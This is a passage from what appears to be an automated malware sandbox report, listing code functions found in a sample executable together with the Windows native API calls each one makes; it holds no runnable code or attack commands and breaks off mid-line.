Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A430 ZwQueryVirtualMemory,0_2_7268A430
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726D1408 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,0_2_726D1408
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7265740C ZwQueryPerformanceCounter,0_2_7265740C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72642416 ZwClose,RtlFreeHeap,0_2_72642416
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7270E407 ZwQueryVirtualMemory,ZwProtectVirtualMemory,0_2_7270E407
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A410 ZwQueryInformationToken,0_2_7268A410
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268B410 ZwOpenProcessToken,0_2_7268B410
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7267341B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,0_2_7267341B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726FE4E9 memset,RtlInitUnicodeString,RtlInitUnicodeString,ZwEnumerateValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,0_2_726FE4E9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_727164FB ZwQueryVolumeInformationFile,RtlAllocateHeap,ZwReadFile,ZwWriteFile,ZwSetInformationFile,RtlFreeHeap,RtlNtStatusToDosError,0_2_727164FB
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726474EA ZwQueryVirtualMemory,ZwProtectVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,0_2_726474EA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7264E4F4 ZwEnumerateValueKey,0_2_7264E4F4
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A4F0 ZwOpenThreadTokenEx,0_2_7268A4F0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_727014EC RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727014EC
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726D34C9 RtlAllocateHeap,ZwOpenKey,ZwClose,ZwQueryValueKey,RtlQueryEnvironmentVariable_U,ZwQueryValueKey,RtlExpandEnvironmentStrings_U,ZwEnumerateValueKey,RtlFreeHeap,RtlFreeHeap,0_2_726D34C9
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A4C0 ZwTerminateProcess,0_2_7268A4C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726ED4C0 memset,RtlEnterCriticalSection,RtlLockHeap,RtlUnlockHeap,RtlLeaveCriticalSection,memset,ZwClose,ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwMapViewOfSection,RtlDebugPrintTimes,ZwUnmapViewOfSection,ZwClose,0_2_726ED4C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_727184CD RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727184CD
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726504A0 RtlCheckTokenMembershipEx,ZwOpenThreadTokenEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwClose,RtlCreateSecurityDescriptor,RtlSetOwnerSecurityDescriptor,RtlSetGroupSecurityDescriptor,RtlCreateAcl,RtlInitializeSidEx,RtlSetDaclSecurityDescriptor,ZwAccessCheck,ZwClose,RtlInitializeSidEx,RtlCheckTokenMembershipEx,0_2_726504A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A4A0 ZwUnmapViewOfSection,0_2_7268A4A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_726794B0 LdrpResGetMappingSize,RtlImageNtHeaderEx,ZwQueryVirtualMemory,LdrpResGetMappingSize,RtlGetCurrentServiceSessionId,LdrpResGetMappingSize,RtlGetCurrentServiceSessionId,0_2_726794B0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72657488 RtlAcquireSRWLockExclusive,RtlAllocateHeap,memcpy,ZwSetInformationProcess,RtlReleaseSRWLockExclusive,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,0_2_72657488
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7266D490 ZwReleaseWorkerFactoryWorker,_allshl,RtlAcquireSRWLockExclusive,memmove,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,0_2_7266D490
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7267D499 RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,0_2_7267D499
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72646570 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,0_2_72646570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72715567 ZwDelayExecution,0_2_72715567
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7267A570 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,0_2_7267A570
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A570 ZwOpenSection,0_2_7268A570
                          Source: C:\Users\user\Desktop\y